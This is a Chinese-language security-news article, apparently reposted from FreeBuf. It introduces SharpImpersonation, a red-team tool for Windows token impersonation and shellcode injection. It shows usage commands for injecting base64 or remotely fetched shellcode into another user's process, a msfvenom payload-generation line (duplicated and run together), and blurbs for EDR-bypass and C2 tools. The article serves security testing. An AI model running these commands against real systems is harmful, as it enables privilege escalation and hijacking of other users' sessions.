Loading [MathJax]/jax/output/CommonHTML/config.js
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >SharpImpersonation:一款基于令牌和Shellcode注入的用户模拟工具

SharpImpersonation:一款基于令牌和Shellcode注入的用户模拟工具

作者头像
FB客服
发布于 2022-11-14 07:41:30
发布于 2022-11-14 07:41:30
42200
代码可运行
举报
文章被收录于专栏:FreeBufFreeBuf
运行总次数:0
代码可运行

关于SharpImpersonation

SharpImpersonation是一款功能强大的用户模拟工具,该工具基于令牌机制和Shellcode注入技术实现其功能,可以帮助广大研究人员更好地对组织内部的网络环境和系统安全进行分析和测试。

该工具基于Tokenvator的代码库实现其功能,并对其部分代码进行了优化,同时还添加了还嗯多其他的功能,并且还参考借鉴了很多其他优秀的开源工具。

功能介绍

1、使用list参数枚举本地系统中的所有用户; 2、以非提权上下文枚举本地系统中的所有用户; 3、自动提权为“SYSTEM”; 4、搜索目标用户名的第一个进程,将其进程ID作为目标; 5、支持从Webserver加载Stager; 6、......

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
git clone https://github.com/S3cur3Th1sSh1t/SharpImpersonation.git

(向右滑动,查看更多)

工具使用

枚举用户进程

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
PS > PS C:\temp> SharpImpersonation.exe list

枚举提权进程

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
PS > PS C:\temp> SharpImpersonation.exe list elevated

(向右滑动,查看更多)

模拟目标用户的第一个进程并执行新的代码

代码语言:javascript
代码运行次数:0
运行
复制
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
PS > PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>

(向右滑动,查看更多)

向目标用户的第一个进程注入Base64编码的Shellcode

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>
(向右滑动,查看更多)

从Webserver载入Shellcode并注入到目标用户的第一个进程

代码语言:javascript
代码运行次数:0
运行
复制
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>

(向右滑动,查看更多)

通过ImpersonateLoggedOnuser模拟当前会话的目标用户

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
PS > PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
(向右滑动,查看更多)

生成msfvenom Shellcode并注入到其他用户进程中

代码语言:javascript
代码运行次数:0
运行
复制
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=threadmsfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread | base64 -w0

(向右滑动,查看更多)

项目地址

SharpImpersonation:

https://github.com/S3cur3Th1sSh1t/SharpImpersonation

参考资料:

https://github.com/0xbadjuju/Tokenvator https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/ https://lolbas-project.github.io/ https://thewover.github.io/Dynamic-Invoke/ https://github.com/TheWover/DInvoke https://github.com/djhohnstein/SharpChromium https://github.com/V1V1/SharpScribbles/tree/master/ThunderFox https://s3cur3th1ssh1t.github.io/On-how-to-access-protected-networks/ https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH https://www.mcafee.com/enterprise/en-us/assets/reports/rp-access-token-theft-manipulation-attacks.pdf

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-09-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
如何使用SharpNamedPipePTH实现令牌模拟
SharpNamedPipePTH是一款基于C#开发的安全工具,该工具可以利用哈希传递技术(Pass-the-Hash)在本地命名管道上进行身份认证,并实现用户令牌模拟。需要注意的是,该工具需要本地管理员权限或SEImpersonate权限。
FB客服
2022/11/14
1.9K0
如何使用SharpNamedPipePTH实现令牌模拟
AV|Ator:一款功能强大的AV检测绕过工具
 关于AV | Ator  AV|Ator是一款功能强大的AV检测绕过工具,从本质上来说,该工具是一个后门生成实用工具,该工具使用了加密技术和注入技术来尝试绕过反病毒产品的检测。因此,广大研究人员可以使用该工具来测试目标反病毒产品的安全检测能力。  技术实现  1、该工具使用了AES加密算法来对给定的Shellcode进行加密处理; 2、该工具可以生成一个包含了加密Payload的可执行文件; 3、最终的Shellcode可以使用各种不同的注入技术在目标操作系统中执行注入和解密;  工具安装 
FB客服
2023/05/12
9500
AV|Ator:一款功能强大的AV检测绕过工具
FUD-UUID-Shellcode:一款基于C++的Shellcode注入工具
FUD-UUID-Shellcode是一款功能强大的Shellcode注入工具,该工具基于C++语言开发,并使用了异或XOR加密技术UUID字符串混淆来尝试绕过Windows Defender。广大研究人员可以使用该工具测试目标系统的安全性,或研究Windows Defender相关的安全问题。
FB客服
2022/11/14
8310
FUD-UUID-Shellcode:一款基于C++的Shellcode注入工具
如何使用Maskyi并通过ADCS远程导出域用户凭证
Masky是一个功能强大的Python库,Masky带有自己的命令行接口,可以允许广大研究人员在不需要转储LSASS进程内存数据的情况下,通过一个ADCS远程导出域用户凭证。
FB客服
2022/11/14
6400
如何使用Maskyi并通过ADCS远程导出域用户凭证
渗透测试常规操作记录(下)
Linux 操作系统&内核版本&环境变量 >cat /etc/issue >cat /etc/*-release >cat /etc/lsb-release >cat /etc/redhat-release cat /proc/version >uname -a >uname -mrs >rpm -q kernel >dmesg | grep Linux >ls /boot | grep vmlinuz- >cat /etc/profile >cat /etc/bashrc >cat ~/.bash_pr
天钧
2020/10/23
5.9K0
渗透测试常规操作记录(下)
PPLcontrol:一款功能强大的受保护进程安全控制工具
PPLcontrol是一款功能强大的受保护进程安全控制工具,在该工具的帮助下,广大研究人员可以快速枚举出目标操作系统中受保护的进程,并获取指定进程的保护级别,或给目标进程设置任意保护级别。
FB客服
2023/09/08
9530
PPLcontrol:一款功能强大的受保护进程安全控制工具
总结到目前为止发现的所有EDR绕过方法
所有关注攻击性安全社区的人都会在过去两年中一次又一次地遇到Userland hooking, Syscalls, P/Invoke/D-Invoke等术语。我自己也遇到了一些我不完全理解的博客文章和工具。我有时觉得我需要从头开始积累知识。由于我在很多情况下不需要这些“新”技术,我把这些课题的研究推迟了几个月。
黑伞安全
2021/02/26
9.9K0
总结到目前为止发现的所有EDR绕过方法
反弹shell | 反弹shell总结
声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
安全小王子
2022/12/11
3.7K0
反弹shell | 反弹shell总结
Pyramid:一款专为红队设计的EDR绕过工具
Pyramid是一款由多个Python脚本和模块依赖组成的EDR绕过工具,该工具专为红队研究人员设计,可以帮助广大研究人员通过利用Python的一些规避属性并尝试让EDR将其视为合法的Python应用程序,来实现红队渗透任务。
FB客服
2023/02/10
6260
Pyramid:一款专为红队设计的EDR绕过工具
laZzzy:一款功能强大的Shellcode加载器
laZzzy是一款功能强大的Shellcode加载器,该工具使用了各种不同的开源代码库实现其功能,能够给广大研究人员更好地演示恶意软件所使用的常见的不同代码执行技术。
FB客服
2023/02/10
8090
laZzzy:一款功能强大的Shellcode加载器
Nimbo-C2:一款功能强大的轻量级C2 框架
Nimbo-C2是一款功能强大的轻量级C2 框架,Nimbo-C2代理支持x64 Windows&Linux操作系统。该工具基于Nim和Python开发,其WIndows端使用了.NET组件。Nim的功能非常强大,但在跟Windows系统交互时使用PowerShell可能会更加简单,因此该工具的部分功能是基于PowerShell实现的。Nimbo-C2的Linux代理更加的精简,只能执行基本命令,其中包括ELF加载(通过memfd技术实现)等。
FB客服
2023/08/08
8230
Nimbo-C2:一款功能强大的轻量级C2 框架
Invoke-PSObfuscation:一款功能强大的PowerShell Payload代码混淆工具
 关于Invoke-PSObfuscation  Invoke-PSObfuscation是一款功能强大的PowerShell Payload代码混淆工具,在该工具的帮助下,广大研究人员可以轻松对PowerShell Payload中的各个组件以及各部分代码进行混淆处理,以测试安全防护产品的检测性能。 传统的混淆技术倾向于通过添加代码/编码层来封装标准代码,例如base64或压缩等。这种技术所处理的Payload从某种程度上来说也能取得不错的效果,但在提取预期Payload时又往往会出各种问题,而且也容易被
FB客服
2023/04/26
8520
Invoke-PSObfuscation:一款功能强大的PowerShell Payload代码混淆工具
使用GoPurple运行Shellcode并评估终端安全性能
GoPurple是一款功能强大的Shellcode运行工具,该工具基于Golang开发。GoPurple由多种不同的技术结合实现,其中包括了大量Shellcode注入技术。GoPurple可以帮助广大研究人员更好地评估终端安全解决方案的检测能力。
FB客服
2021/10/11
5960
1.1 Metasploit 工具简介
Metasploit 简称(MSF)是一款流行的开源渗透测试框架,由Rapid7公司开发,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。并且该框架还提供了一系列攻击模块和Payload工具,可用于漏洞利用、及漏洞攻击。同时软件自身支持多种操作系统平台,包括Windows、Linux、MacOS等。直到今天Metasploit已成为众多黑客手中渗透攻击的利器,并在安全领域大展身手。
王 瑞
2023/06/30
5800
1.1 Metasploit 工具简介
Reverse_SSH:一款基于SSH的反向Shell工具
 关于Reverse_SSH  Reverse_SSH上一款基于SSH的反向Shell工具,在该工具的帮助下,广大研究人员可以使用SSH来实现反向Shell,并同时拥有下列功能: 1、使用原生SSH语句管理和连接反向Shell; 2、动态、本地和远程转发; 3、原生SCP和SFTP实现,用于从目标获取文件; 4、完整功能的Windows Shell; 5、实现了客户端&服务器端身份验证,以创建高信任高可用的控制通道; 6、其他...  工具架构   工具安装  Docker
FB客服
2023/03/30
1.2K0
Reverse_SSH:一款基于SSH的反向Shell工具
metasploit framework的一些使用姿势
Meterpreter的persistence脚本允许注入Meterpreter代理,以确保系统重启之后Meterpreter还能运行。
中龙技术
2022/09/29
1.2K0
反弹shell的学习总结 - Part 2
dnscat2(https://github.com/iagox86/dnscat2)是一个DNS隧道,旨在通过DNS协议创建加密的命令和控制(C&C)通道。dnscat2分为两部分:客户端和服务端。dnscat2客户端采用C语言编写,服务器端采用ruby语言编写。后来又有安全研究人员使用PowerShell脚本重写了dnscat2客户端dnscat2-powershell(https://github.com/lukebaggett/dnscat2-powershell)。
安全小王子
2020/07/31
2K0
反弹shell的学习总结 - Part 2
sRDI:一款通过Shellcode实现反射型DLL注入的强大工具
今天给大家介绍的是一款名叫sRDI的注入工具,它可以基于Shellcode实现反射型DLL注入,并能够将DLL转换成独立的Shellcode。
FB客服
2018/09/21
2.2K0
sRDI:一款通过Shellcode实现反射型DLL注入的强大工具
Monomorph:一款功能强大的MD5单态Shellcode封装工具
 关于Monomorph  Monomorph是一款功能强大的MD5单态Shellcode封装工具,在该工具的帮助下,广大研究人员可以轻松将所有的Payload都修改为相同的MD5哈希。 在很多情况下,研究人员通常使用“碰撞”的形式来判断目标代码的“好”与“坏”,但Monomorph的出现就是为了证明之前的这种方法已经不再可行。因为如果仍然坚持使用MD5来引用文件样本的话,一旦使用了Monomorph,那么最终的分析结果将会毫无意义。因为所有的Payload或代码文件都将拥有相同的MD5哈希。  工具运
FB客服
2023/03/29
3020
Monomorph:一款功能强大的MD5单态Shellcode封装工具
Chimera:一款带有EDR规避功能的自动化DLL侧加载工具
Chimera是一款带有EDR规避功能的自动化DLL侧加载工具,在该工具的帮助下,广大研究人员可以在渗透测试过程中,绕过EDR的检测并实现自动化DLL侧加载。
FB客服
2023/09/27
7390
Chimera:一款带有EDR规避功能的自动化DLL侧加载工具
推荐阅读
相关推荐
如何使用SharpNamedPipePTH实现令牌模拟
更多 >
交个朋友
加入腾讯云官网粉丝站
蹲全网底价单品 享第一手活动信息
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验